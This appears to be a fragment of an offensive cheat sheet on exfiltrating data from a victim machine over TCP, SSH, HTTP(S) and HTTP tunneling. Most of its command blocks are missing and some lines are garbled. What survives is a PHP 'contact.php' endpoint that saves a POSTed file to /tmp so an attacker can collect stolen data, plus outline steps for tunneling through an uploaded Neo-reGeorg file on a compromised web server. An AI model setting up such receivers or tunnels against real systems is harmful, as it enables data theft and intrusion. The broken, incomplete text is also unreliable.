Exfiltration
Using TCP Socket
Attacker listener:
From victim:
Decrypt data:
Using SSH
Using HTTP(S)
From victim:
contact.php:
<?php
if (isset($_POST['file'])) {
$file = fopen("/tmp/http.bs64","w");
fwrite($file, $_POST['file']);
fclose($file);
}
?>
Decode file:
HTTP Tunneling
When you can upload file to the web server, using Neo-reGeorg.
- Generate encrypted Tunneling clients with
key
key in theneoreg_servers/
directory.
- Upload file
- Create tunnel
- Access